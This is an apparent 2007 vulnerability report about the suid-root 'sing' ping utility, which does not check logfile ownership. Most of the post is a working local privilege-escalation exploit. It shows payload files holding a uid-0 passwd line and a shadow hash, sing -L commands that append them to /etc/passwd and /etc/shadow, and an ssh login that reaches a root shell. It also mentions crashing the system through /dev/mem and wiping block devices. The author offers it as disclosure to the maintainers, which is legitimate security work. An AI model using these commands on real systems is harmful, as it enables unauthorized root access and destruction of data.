Milen Rangelov - 2007-12-03

It seems like sing does not check logfile ownership. If you install it suid root (e.g from a debian package), you are taking a great risk.

A malicious local user can use -L /dev/mem and crash the system...or any block device to destroy its data.

The worst is that a carefully crafted command can be used to add a new superuser account to the system, e.g:

gat3way@gat3way:~$ cat hah

hack:x:0:0:/tmp:/bin/sh

n
gat3way@gat3way:~$ cat hah1

hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::

n
gat3way@gat3way:~$ grep hack /etc/passwd
gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@gat3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@gat3way:~$ ssh hack@localhost
hack@localhost's password:
..
root@gat3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gat3way:~#

Just to inform you...I think it could be easily fixed.

Greets :)